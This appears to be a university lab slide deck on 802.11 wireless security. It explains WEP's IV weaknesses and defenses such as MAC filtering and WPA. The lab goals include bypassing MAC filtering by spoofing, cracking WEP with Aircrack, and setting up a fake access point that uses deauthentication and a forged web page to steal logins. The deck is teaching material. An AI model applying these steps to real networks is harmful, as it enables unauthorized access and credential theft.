Wireless Security

John HimmeleinErick Andrew

Christian AdamVarun Bapna

Outline● 802.11 Overview

● WEP

● Other security measures

● Attacks

● Lab motivation

802.11 Overview● IEEE 802.11 denotes a set of wireless standards definied by IEEE

● Most popular include 802.11a/b/g

● 802.11a is in the 5GHz band, b/g is in the2.4GHz band

● 802.11i is intended to improve security

Security Features● Service Set Identifier (SSID)

● Used to differentiate between access points

● Sent out in a beacon frame

● These are plain text messages

Associating with an AP● Two initialization methods

● Shared Key or Open Key

● With Open Key anyone can talk to the AP

● Shared Key requires authentication as soon as association succeeds

Wired Equivalent Privacy (WEP)

● WEP uses the stream cipher C4– RC4 generates a pseudorandom stream of bits (a "keystream") which is

combined with the plaintext using xor– Decryption is performed the same way

● WEP uses two key sizes: 40 bit &104 bit– 64 bit and 128 bit WEP

● To each is added a 24-bit initialization vector

(IV) which is transmitted in the clear.

WEP● WEP has several weaknesses

● The weakness with RC4 is with the Initialization Vector (IV)

● This lead to several different types of attacks

● We will use a tool that combines two of these attacks, and the appendix will describe another

WEP attack #1● The 24 bit IV has a numerical limit

● Only 16,777,216 possible IVs

● Listening long enough, and IVs will be repeated

● Enough duplicate IVs and the WEP key can be determined

WEP attack #2● Another attack relies on the fact that some

IVs are weak

● Using a formula, one can take a weak IV and infer part of the WEP key

● Listening to the network long enough and the WEP key can be discovered

● This attack, like the last one, can take a very long time

WEP attack #3

● A new attack was developed by a hacker name KoreK

● This attack relies on gathering enough unique IVs

● This is a statistical attack that requires about 200,000 unique IVs to determine a 40-bit WEP key

Default Settings● Most consumer access points are very easy

to setup

● However, their default states have no security and are easy to lookup

● Despite this, many people leave their APs in this state, making them easy targets

Protecting Your Network● There are several methods to increase the

security of a wireless network

● Turning off SSID broadcasting

● SSID broadcasting helps attackers find your WLAN

● While not broadcasting will not stop anyone, it will make your network less interesting

MAC Address Filtering● MAC address filtering allows only a set list of

hardware devices connect

● In theory every device will have a unique MAC address

● However, using a sniffer the MAC address of a valid client is easily found

● Most wireless cards allow their MAC addresses to be changed

WPA - Wi-Fi Protected Access● By increasing the size of the keys, the

number of keys in use, and adding a secure message verification system, WPA makes breaking into a Wireless LAN far more difficult.

● The Michael algorithm was the strongest that WPA designers could come up with that would still work with most older network cards; however it is subject to attack. To limit this risk, WPA networks shut down for 30 seconds whenever an attempted attack is detected.

Lab Goals● Determine router type and defaults

● Examining unencrypted traffic

● Bypassing MAC address filtering

● Cracking WEP using Aircrack

● Setting up a fake AP to steal login information

Network Layout

Unencrypted Traffic

MAC Address Filtering

● Sniff traffic for a valid MAC address

● Change your MAC address to the valid one (Spoofing)

● Full access if no encryption on the network

Cracking WEP with Aircrack● Airodump collects

packets● Aircrack is used on

the output file from Airodump

● It uses unique IVs to break the WEP key

● ~330,000 unique IVs and Aircrack broke the key in 1 second

● ~100,000 and it took 21 seconds

Fake AP● The tool suite we will use allows us to setup

our wireless card as an access point● To make this useful we will need to do some

work● By deauthenticating a client from his AP, we

can make him connect to our fake one● By forging a web page we can potentially

steal important login information● This attack is very hard for the victim to

realize until it is far to late

Links to tools● Ethereal –

– http://www.ethereal.com

● Kismet – – http://www.kismetwireless.net

● Auditor security collection -– http://new.remote-exploit.org/index.php/Auditor_main

● Aircrack –– http://www.cr0.net:8040/code/network/aircrack

References

● http://en.wikipedia.org/wiki/RC4

● http://en.wikipedia.org/wiki/WEP

● http://en.wikipedia.org/wiki/IEEE_802.11

● http://www.securityfocus.com/infocus/1814

● http://www.cr0.net:8040/code/network/aircrack/

Questions?